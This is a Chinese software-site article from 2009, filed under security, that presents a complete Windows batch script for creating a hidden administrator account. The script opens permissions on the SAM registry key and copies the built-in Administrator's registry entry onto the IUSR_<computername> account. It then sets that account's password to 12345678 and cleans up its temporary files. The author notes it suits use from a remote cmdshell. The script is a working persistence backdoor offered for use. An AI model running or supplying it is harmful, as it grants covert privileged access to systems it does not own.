pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范批处理实现的隐藏administrator账号
阅读排行

批处理实现的隐藏administrator账号


2009/2/21  编辑:佚名 来源:本站整理

其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现, 贴出来吧

echo off

setlocal enabledelayedexpansion

echo %computername%

echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"

regini "%windir%\..\1.reg"

regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%

rem unicode ->ascii

type "%windir%\..\1.reg" >"%windir%\..\2.reg"

del /q "%windir%\..\1.reg"

rem find IUSR_%computername% 的对应id

for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b

del /q "%windir%\..\2.reg"

rem export administrator register

regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

type "%windir%\..\1.reg" >"%windir%\..\2.reg"

del /q "%windir%\..\1.reg"

rem replace 1fx->iusr_id

for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (

for /f "tokens=*" %%j in ("%%i") do (

set TMP=%%j

set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"

echo !TMP!>>%windir%\..\1.reg

)

)

regedit /s %windir%\..\1.reg

del /q %windir%\..\1.reg

del /q %windir%\..\2.reg

echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"

regini "%windir%\..\1.reg"

del /q "%windir%\..\1.reg"

net user IUSR_%computername% 12345678

克隆出来的用户名是固定的,随便变换的话要改代码

相关文章

实用的dos/bat批处理教程:该教程一共分为4大部分,第一部分是批处理的专用命令,第二部分是特殊的符号与批处理,第三部分是批处理与变量,第四部分是完整案例。

批处理备份交换机日志的方法:华为交换机开启日志文件传送功能,发送到某服务器,现在需将收集的日志文件定期打包备份到金山快盘,写了一个批处理,跑在计划任务里。

用批处理实现屏蔽恶意网址:@echooff@setlocalENABLEDELAYEDEXPANSIONtitle可屏蔽网址的批处理.:beginmodeconcols=50lines=56echo*echo*选择如下操作echo.echo.echo***1.添加要...。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图